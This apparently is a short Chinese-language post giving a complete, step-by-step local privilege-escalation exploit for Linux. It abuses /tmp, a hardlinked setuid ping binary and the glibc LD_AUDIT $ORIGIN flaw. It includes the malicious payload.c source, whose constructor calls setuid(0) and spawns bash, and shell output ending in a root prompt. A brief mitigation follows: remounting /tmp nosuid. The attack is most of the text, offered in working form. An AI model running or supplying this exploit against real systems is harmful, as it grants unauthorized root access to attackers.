linux 利用tmp提权

以一个普通用户登录
[hello@localhost tmp]$ ls -ld /tmp/ 因为tmp目录能写文件！！
drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/
[hello@localhost tmp]$ cd /tmp/
[hello@localhost tmp]$ mkdir exploit
[hello@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[hello@localhost tmp]$ exec 3< /tmp/exploit/target 文件描述符，把/tmp/exploit/target定义为文件描述符3
[hello@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target
[hello@localhost tmp]$ rm -fr /tmp/exploit/
[hello@localhost tmp]$ ls -l /proc/$$/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted)
[hello@localhost tmp]$ cat > payload.c 高级系统管理员必须要把c学的很明白！！
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[hello@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[hello@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit
[hello@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 定义环境变量
[root@localhost tmp]# whoami
root

--------------
http://marc.info/?l=full-disclosure&m=128739684614072&w=2
-
一般不开777权限目录的. 如果要则
对777的目录做如下操作,可以控制你提权的.比如/tmp
# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp nosuid 不允许执行suid权限